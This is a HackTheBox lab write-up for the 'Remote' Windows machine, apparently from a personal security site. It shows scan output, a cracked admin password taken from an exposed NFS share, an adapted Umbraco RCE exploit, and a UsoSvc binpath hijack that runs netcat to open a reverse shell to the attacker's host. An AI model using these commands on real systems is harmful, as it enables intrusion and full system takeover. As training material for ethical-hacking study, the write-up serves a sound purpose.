130n@calvinlai.com
  • About Calvin Lai (fkclai)
  • My Work
  • Cyber Security
    • Cyber Security Centre (CSC)
      • Why we need a CSC
      • CSC Team Structure: Roles, Functions, and Tools
        • Key Function & Role
        • Tools & Platforms
        • People
        • Outsource Strategy
      • HRMC Executive Paper
  • Detection and Response
    • Playbook: Threat Prioritization & Automated Response Strategies
      • Scenario: Detecting and Mitigating a Ransomware Attack
      • Scenario: DC Sync Attack Detected and Mitigated
      • Scenario: Pass-the-Hash (PtH) Attack Detected and Contained
      • Scenario: Phishing Campaign with Malware / Credential Theft Detected and Mitigated
  • Application Architecture
    • Comparison of MVC , N-tier and Microservice Architecture
  • Application Security
    • OAuth, SAML, and OpenID Connect: Key Differences and Use Cases
    • Secure Coding Principles
    • HTTP Header Security Principles
    • Mitigating Broken Object Level Authorization (BOLA)
    • Spring Boot Validation
    • Output Encoding in JavaServer Faces (JSF)
    • Session Management Security Issues
    • Common API Security Problems
      • Broken Authentication
      • Excessive Data Exposure
      • Lack of Resources & Rate Limiting
      • Broken Function Level Authorization
      • Unsafe Consumption of APIs
    • JAVA Exception Handling
    • File Upload Validation
    • OAuth 2.0 Security
      • Insecure Storage of Access Tokens
    • Microservice Security
      • Sample Coding Demo
        • Service Implementation
        • Client Interaction
      • Security Solution for Microservices Architecture
    • Modifying and Protecting Java Class Files
      • Modify a Class File Inside a WAR File
      • Direct Bytecode Editing
        • Steps to Directly Edit a Java Class File
          • Update: Java Bytecode Editing Tools
      • Techniques to Protect Java Class Files
        • Runtime Decryption in WebLogic
    • JAVA Program
      • Secure, Concurrent Web Access Using Java and Tor
      • Creating a Maven Java project in Visual Studio Code
  • Exploit/CVE PoC
    • ZeroLogon Exploit
    • Remote Retrieved Chrome saved Encrypted Password
    • Twitter Control an RCE attack
  • Hacking Report (HTB)
    • Hits & Summary
      • Tools & Cheat Sheet
    • Windows Machine
      • Love 10.10.10.239
      • Blackfield 10.10.10.192
      • Remote 10.10.10.180
      • Sauna 10.10.10.175
      • Forest 10.10.10.161
      • Sniper
      • Json
      • Heist
      • Blue
      • Legacy
      • Resolute
      • Cascade
    • Linux Machine
      • Photobomb 10.10.11.182
      • Pandora 10.10.11.136
      • BountyHunter 10.10.11.100
      • CAP 10.10.10.245
      • Spectra 10.10.10.229
      • Ready 10.10.10.220
      • Doctor 10.10.10.209
      • Bucket 10.10.10.212
      • Blunder 10.10.10.191
      • Registry 10.10.10.159
      • Magic
      • Tabby
  • Penetration Testing
    • Web Application PenTest
    • Network/System PenTest
    • Mobile Penetration Test
      • Certificate Pinning
        • Certificate Pinning Bypass (Android)
          • Root a Android Device
          • Setup Proxy Tool - Burp Suite
      • Checklist
  • Threat Intelligence
    • Advanced Persistent Threat (APT) groups
      • North Korean APT Groups
      • Chinese APT Groups
      • Russian APT Groups
      • Other APT
  • Red Team (Windows)
    • 01 Reconnaissance
    • 02 Privileges Escalation
    • 03 Lateral Movement
    • 04 AD Attacks
      • DCSync
    • 05 Bypass-Evasion
    • 06 Kerberos Attack
    • 99 Basic Command
  • Exploitation Guide
    • 01 Reconnaissance
    • 02 Port Enumeration
    • 03 Web Enumeration
    • 04 Windows Enum & Exploit
      • Windows Credential Dumping
        • Credential Dumping: SAM
        • Credential Dumping: DCSync
      • Kerberos Attack
      • RDP
    • 05 File Enumeration
    • 06 Reverse Shell Cheat Sheet
      • Windows Reverse Shell
      • Linux Reverse Shell
    • 07 SQL Injection
    • 08 BruteForce
    • 09 XSS Bypass Checklist
    • 10 Spring Boot
    • 11 WPA
    • 12 Payload list
  • Vuln Hub (Writeup)
    • MrRobot
    • CYBERRY
    • MATRIX 1
    • Node-1
    • DPwwn-1
    • DC7
    • AiWeb-2
    • AiWeb-1
    • BrainPan
  • CTF (Writeup & Tips)
    • CTF Tools & Tips
    • Hacker One
    • CTF Learn
    • P.W.N. University - CTF 2018
    • HITCON
    • Pwnable
      • 01 Start
  • Useful Command/Tools
    • Kali
    • Windows
    • Linux
  • Offensive Security Lab & Exam
    • Lab
    • Tools for an Offensive Certification
      • Strategy for an Offensive Exam Certification
        • CVEs
        • Privilege Escalation
        • Commands
        • Impacket
  • ISO 27001
    • Disclaimer
    • What is ISO 27001
      • Implementation
    • Documentation
    • Common Mistake
    • Q&A
      • Can internal audit to replace the risk assessment
      • Is it sufficient for only the IT department head to support the ISO 27001 program
      • Does the Business Continuity Plan (BCP) and a Disaster Recovery Plan (DRP) are the same?
    • ISO 27001 Controls and Domains
      • 1. Information Security Policies
      • 2. Organization of Information Security
      • 3. Human Resource Security
      • 4. Asset Management
      • 5. Access Control
      • 6. Cryptographic Controls
      • 7. Physical and Environmental Security
      • 8: Operational Security
      • 9. Communications Security
      • 10. System Acquisition, Development, and Maintenance
      • 11. Supplier Relationships
      • 12: Information Security Incident Management
      • 13. Information Security Aspects of Business Continuity Management
      • 14. Compliance
Powered by GitBook
On this page
  • Background
  • Hacking Process Part 0 – Service Reconnaissance
  • Quick Pre-searching
  • Details Analysis
  • Enumeration strategies
  • Hacking Process Part 1 – Enumeration
  • FTP - 21
  • Website - 80
  • NFS - 2049
  • Hacking Process Part 2 – Initial Low Privilege Access
  • Hacking Process Part 3 – Privilege Escalation
  • Recommendation
  • Reference Link

Was this helpful?

  1. Hacking Report (HTB)
  2. Windows Machine

Remote 10.10.10.180

It doesn’t matter how many times you get knocked down. All that matters is you get up one more time than you were knocked down. <Roy T. Bennett0 May 2020>

PreviousBlackfield 10.10.10.192NextSauna 10.10.10.175

Last updated 4 years ago

Was this helpful?

Background

According to the nmap result, a website is found that installed a vulnerable version of Umbraco CMS and an mountdnfs service is enabled. It can be exploited after we find the credentials from an exposed NFS share. A login credential is found at a file that saves in this NFS share, the credential can be used to log into the Umbraco CMS. An authenticated Umbraco CMS exploitation is found to gain initial access.

130n@calvinlai.com

Target Machine: 10.10.10.180

Attacker Machine: 10.10.14.8

Hacking Process Part 0 – Service Reconnaissance

Quick Pre-searching

Details Analysis

root@kclai: ~/Documents/ctf/htb/windows/12_Remote# nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.192 -o nmap-result.txt 

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-06 17:49 IST
Nmap scan report for 10.10.10.180
Host is up (0.21s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m09s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-09-06T12:21:19
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.81 seconds

Enumeration strategies

According to the nmap result, the following interesting ports are found for further investigation

  1. FTP (21)

  2. Website (80)

  3. NFS (2049)

Hacking Process Part 1 – Enumeration

FTP - 21

Using the credentials anonymous/anonymous to log in to the FTP service successful, but nothing can be found or download from this account.

Website - 80

Going to the website and nothing interesting items can be found. Using the gobuster to check any hidden folder/subdirectory, a list of interesting


 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions:  | HTTP method: GET | Suffixes: php, asp, aspx, jsp, js, do, action, html, json, yml, yaml, xml, cfg, bak, txt, md, sql, zip, tar.gz, tgz | Threads: 10 | Wordlist size: 4614 | Request count: 4614

Error Log: /opt/dirsearch/logs/errors-20-09-06_17-53-02.log

Target: http://10.10.10.180

Output File: /opt/dirsearch/reports/10.10.10.180/20-09-06_17-53-02

[17:53:02] Starting:
[17:53:08] 200 -    7KB - /
[17:53:18] 200 -    5KB - /about-us
[17:53:25] 200 -    5KB - /blog
[17:53:25] 200 -    5KB - /Blog
[17:53:34] 200 -    8KB - /contact
[17:53:34] 200 -    8KB - /Contact
[17:53:56] 200 -    7KB - /home
[17:53:56] 200 -    7KB - /Home
[17:54:00] 302 -  126B  - /install  ->  /umbraco/
[17:54:01] 200 -    3KB - /intranet
[17:54:10] 500 -    3KB - /master
[17:54:21] 200 -    7KB - /people
[17:54:21] 200 -    7KB - /People
[17:54:23] 200 -    3KB - /person
[17:54:28] 500 -    3KB - /product
[17:54:28] 200 -    5KB - /products
[17:54:28] 200 -    5KB - /Products
[17:54:55] 200 -    4KB - /umbraco

An administrative page is found, we cannot log into the system using some default accounts such as admin/admin. Move to next for further checking.

NFS - 2049

Using showmounttool to check which NFS share is accessible by who

The site_backupsis available to mount and is accessible to everyone, let’s mount it and further enumerate.

Check the folder one by one and found that a file named mbraco.sdfinside the folder/App_Data which contains credentials at the top of the file.

strings Umbraco.sdf | head
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f

Hacking Process Part 2 – Initial Low Privilege Access

Let login to Umbraco CMS with the credentials found admin@htb.local / baconandcheese.

Just checked the version is Umbraco 7.12.4, google any vulunerability found at the exploit DB.

...
login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";
...

In order to get the reversed TCP shell, the payload is changed to download a netcat 64 bits Windows version.

Next, stand up a listener on port 80 and run the exploit.

Change the payload again to start the reversed TCP shell to my Kali machine

Start the listening port at my Kali machine, the reverse shell is returned.

The user flag can be found in the C:\Users\Public folder.

Hacking Process Part 3 – Privilege Escalation

Start from gathering the system information

[+] Modifiable Services
   [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
    UsoSvc: AllAccess, Start

Because of the full access to UsoSvc service, we can modify the binpath of the service and pop us a reverse shell.

sc.exe stop UsoSvc
sc config UsoSvc binpath= "C:\windows\temp\nc.exe -nv 10.10.14.6 1235 -e C:\WINDOWS\System32\cmd.exe"
sc.exe qc usosvc

Recommendation

Several known vulnerability is found on this box that makes us can finish the game easily. It is told us that system patching is the most important preventive action to defect cyber attack.

Reference Link

Remote is a Windows machine from , that is focusing on the CVE exploitation technique, for training your ethical hacking skills and penetration testing skills.

Based on the result of the , there is a possible local privilege escalation vector on a full access service named UsoSvc. Modifying the binpath of the service return the reverse shell with administrator privilege.

nmap -Pn -p- -T5 --min-rate=1000 10.10.10.180 -oG fkclai.nmap

gobuster dir --url= -- wordlist=/usr/share/wordlists/dirb/common.txt

Crack the password which SHA1 hash b8be16afba8c314ad33d812f22a04991b90e2aaausing an online hash service. Finally, get the credentials user id: admin@htb.local and password baconandcheese

This version suffers from an authenticated remote code execution vulnerability. Download the and modify the login details as below.

systeminfo

Result of the , discover possible local privilege escalation vectors, shows the full access of a service named as UsoSvC

HackTheBox
WinPEAS
http://10.10.10.180/
decrypting
exploit
winPEAS.exe
PEASS-ng/winPEAS/winPEASexe at master · carlospolop/PEASS-ngGitHub
Competed on 30 May 2020
whoami /priv
Logo